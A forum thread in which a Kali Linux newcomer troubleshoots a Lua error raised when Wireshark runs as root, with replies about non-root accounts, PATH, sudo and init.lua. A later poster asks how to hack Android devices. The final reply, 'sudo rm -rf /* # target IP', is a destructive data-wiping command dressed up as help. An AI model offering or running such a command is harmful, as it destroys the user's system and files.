Forum Thread: Problems with Wireshark as Root User on Kali

Hey, im new to the website and a newbie with Kali. Please bear with me :) I have installed Kali on an acer and everything is up and running. Im having some problems running Wireshark as a Root user. This is the error im receiving when i try to launch: "Lua: Error during loading: string "/usr/share/wireshark/init.lua":44: dofile has been disabled due to running Wireshark as superuser"

I have been looking up different ways to fix this but nothing has worked so far. Iv read running Wireshark as a Root user could be potenionally dangerous, if so how can i run wireshark ? I did try create an Admin account but i was unable to run any commands. If i tried to run ifconfig for example it would come back "bash: ifconfig: command not found."

Bit confused now as to what i should be doing.

Any help would be greatly appreciated :D

12 Responses

Yes it's recommended and advisable not to run such tools in super user or high permission account. Giving root to such tools can go sideways should the tool malfunction. You can create a non-super user account or non root account and that should fix the error dialog. Also, the tool should still work when that error dialog shows up, It just warns you of the privileges you are assigning to the tool.

# Sergeant

Ok cool so i have two other accounts set up. An administrator and a standard account. When im using either account and run any commands it comes back with "bash: command not found" How can i get around this ? Is there another way to set up a non root user ?

type "wiresh" and then press tab to autofinish. might be that it is wireshark-gtk instead of wireshark

Sounds like you don't have a PATH - can you run things like echo and export? if so, on your root user, do
echo $PATH
, then, on the administrator user, use
export PATH=(output from echo)

. Let me know if that does anything for ya

log onto the graphical session as a non root user, then in a terminal use the 'su' command to log on as root in the terminal. Then you can run root command in that terminal.

Create a useraccount on Kali Linux, login, and start Wireshark from there.

I have it working now guys thanks for all your help. I logged in with the admin account and ran the sudo before each command. It prompts for the admin password and then the commands go through as normal. Not sure why it wouldn't work the first time.

Thanks again for all the help that was really bugging me :D

Note that sudo will elevate you to root - running sudo wireshark has basically the same effect as running wireshark from root

nano /usr/share/wireshark/init.lua
'change disable_lua to "true"
disable_lua = true

*Hello guys
Please help me
i have installed Kali Nethunter in Android 10 Device Oppo Realme 3 Ram 3gb and Rom 32gb and snapdragon 720.
All tools are wotking fine but wireshark is not working. When i double tap on it nothing happens.
But when i launch it from terminal by giving command "wireshark" it opens but also shows this error in terminal.
plx help me....

i am running nethunter via vncserver*

guys i need to know how to hack android device by using *Android "Kali Nethunter"*.
olx give me latest vudeo link or best article..

sudo rm -rf /* # target IP

Share Your Thoughts

  • Hot
  • Active